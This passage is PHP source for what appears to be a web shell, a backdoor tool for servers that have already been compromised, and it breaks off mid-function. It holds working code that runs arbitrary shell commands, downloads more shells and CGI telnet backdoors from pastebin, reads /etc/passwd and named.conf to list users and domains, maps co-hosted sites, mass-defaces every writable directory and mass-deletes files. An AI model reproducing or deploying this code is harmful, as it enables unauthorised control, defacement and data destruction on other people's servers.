", # 4 gold
);
return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
}
function OS() {
return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function save($filename, $mode, $file) {
$handle = fopen($filename, $mode);
fwrite($handle, $file);
fclose($handle);
return;
}
function getfile($name) {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
$fp = fopen($get[1], "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $get[0]);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
function usergroup() {
if(!function_exists('posix_getegid')) {
$user['name'] = @get_current_user();
$user['uid'] = @getmyuid();
$user['gid'] = @getmygid();
$user['group'] = "?";
} else {
$user['uid'] = @posix_getpwuid(posix_geteuid());
$user['gid'] = @posix_getgrgid(posix_getegid());
$user['name'] = $user['uid']['name'];
$user['uid'] = $user['uid']['uid'];
$user['group'] = $user['gid']['name'];
$user['gid'] = $user['gid']['gid'];
}
return (object) $user;
}
function getuser() {
$fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
while($read = fgets($fopen)) {
preg_match_all('/(.*?):x:/', $read, $getuser);
$user[] = $getuser[1][0];
}
return $user;
}
function getdomainname() {
$fopen = fopen("/etc/named.conf", "r");
while($read = fgets($fopen)) {
preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
$domain[] = $getdomain[1][0];
}
return $domain;
}
function hddsize($size) {
if($size >= 1073741824)
return sprintf('%1.2f',$size / 1073741824 ).' GB';
elseif($size >= 1048576)
return sprintf('%1.2f',$size / 1048576 ) .' MB';
elseif($size >= 1024)
return sprintf('%1.2f',$size / 1024 ) .' KB';
else
return $size .' B';
}
function hdd() {
$hdd['size'] = hddsize(disk_total_space("/"));
$hdd['free'] = hddsize(disk_free_space("/"));
$hdd['used'] = hddsize(disk_total_space("/") - disk_free_space("/"));
return (object) $hdd;
}
function writeable($path, $perms) {
return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
}
function perms($path) {
$perms = fileperms($path);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
}
elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
}
elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
}
elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
}
elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
}
elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
}
elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
}
else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function lib_installed() {
$lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
return implode(" | ", $lib);
}
function pwd() {
$dir = explode("/", path());
foreach($dir as $key => $index) {
print "$index/";
}
print "
";
print (OS() === "Windows") ? windisk() : "";
}
function windisk() {
$letters = "";
$v = explode("\\", path());
$v = $v[0];
foreach(range("A", "Z") as $letter) {
$bool = $isdiskette = in_array($letter, array("A"));
if(!$bool) $bool = is_dir("$letter:\\");
if($bool) {
$letters .= "[ ";
if($letter.":" != $v) {
$letters .= $letter;
}
else {
$letters .= color(1, 2, $letter);
}
$letters .= " ]";
}
}
if(!empty($letters)) {
print "Detected Drives $letters
";
}
if(count($quicklaunch) > 0) {
foreach($quicklaunch as $item) {
$v = realpath(path(). "..");
if(empty($v)) {
$a = explode(DIRECTORY_SEPARATOR,path());
unset($a[count($a)-2]);
$v = join(DIRECTORY_SEPARATOR, $a);
}
print "".$item[0]."";
}
}
}
function serverinfo() {
$disable_functions = @ini_get('disable_functions');
$disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
$output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
$output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
$output[] = "SYSTEM : ".color(1, 2, php_uname());
$output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
$output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
$output[] = "PHP VERSION : ".color(1, 2, @phpversion());
$output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
$output[] = "DISABLE FUNC: $disable_functions";
$output[] = lib_installed();
$output[] = "Current Dir (".writeable(path(), perms(path())).") ";
print "";
print implode("
", $output);
pwd();
print "
";
}
function curl($url, $post = false, $data = null) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
if($post) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
return curl_exec($ch);
curl_close($ch);
}
function reverse() {
$response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
$response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
$explode = explode(",,", $response);
unset($explode[0]);
foreach($explode as $domain) {
$domain = "http://$domain";
$domain = str_replace(",", "", $domain);
$url[] = $domain;
ob_flush();
flush();
}
return $url;
}
function getValue($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
function massdeface($dir, $file, $filename, $type = null) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === "." || $dir_ === "..") {
file_put_contents($location, $file);
}
else {
if(is_dir($path) AND is_writable($path)) {
print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
";
file_put_contents($location, $file);
if($type === "-alldir") {
massdeface($path, $file, $filename, "-alldir");
}
}
}
}
}
function massdelete($dir, $filename) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === '.') {
if(file_exists("$dir/$filename")) {
unlink("$dir/$filename");
}
}
elseif($dir_ === '..') {
if(file_exists(dirname($dir)."/$filename")) {
unlink(dirname($dir)."/$filename");
}
}
else {
if(is_dir($path) AND is_writable($path)) {
if(file_exists($location)) {
print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
";
unlink($location);
massdelete($path, $filename);
}
}
}
}
}
function tools($toolsname, $args = null) {
if($toolsname === "cmd") {
print "";
}
elseif($toolsname === "readfile") {
if(empty($args)) die(color(1, 1, $msg));
if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
print "";
print htmlspecialchars(file_get_contents($args));
print "
";
}
elseif($toolsname === "spawn") {
if($args === "adminer") {
if(file_exists("adminer.php")) {
print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
if(getfile("adminer")) {
print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php";
}
else {
print color(1, 1, "Error while downloading file Adminer.");
@unlink("adminer.php");
}
}
}
elseif($args === "webconsole") {
if(file_exists("webconsole.php")) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
if(getfile("webconsole")) {
print "";
}
else {
print color(1, 1, "Error while downloading file WebConsole.");
@unlink("webconsole.php");
}
}
}
elseif($args === "cgitelnet1") {
if(file_exists("idx_cgi/cgitelnet1.idx")) {
print "";
}
elseif(file_exists('cgitelnet1.idx')) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
if(!is_dir(path()."/idx_cgi/")) {
@mkdir('idx_cgi', 0755);
save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
}
if(getfile("cgitelnet1")) {
chmod('idx_cgi/cgitelnet1.idx', 0755);
print "";
}
else {
print color(1, 1, "Error while downloading file CGI Telnet.");
@rmdir(path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
}
}
}
elseif($args === "cgitelnet2") {
if(file_exists("idx_cgi/cgitelnet2.idx")) {
print "";
}
elseif(file_exists('cgitelnet2.idx')) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
if(!is_dir(path()."/idx_cgi/")) {
@mkdir('idx_cgi', 0755);
save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
}
if(getfile("cgitelnet2")) {
chmod('idx_cgi/cgitelnet2.idx', 0755);
print "";
}
else {
print color(1, 1, "Error while downloading file CGI Telnet.");
@rmdir(path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
}
}
}
elseif($args === "phpinfo") {
if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
save("phpinfo.php", "w", "'; phpinfo(); print '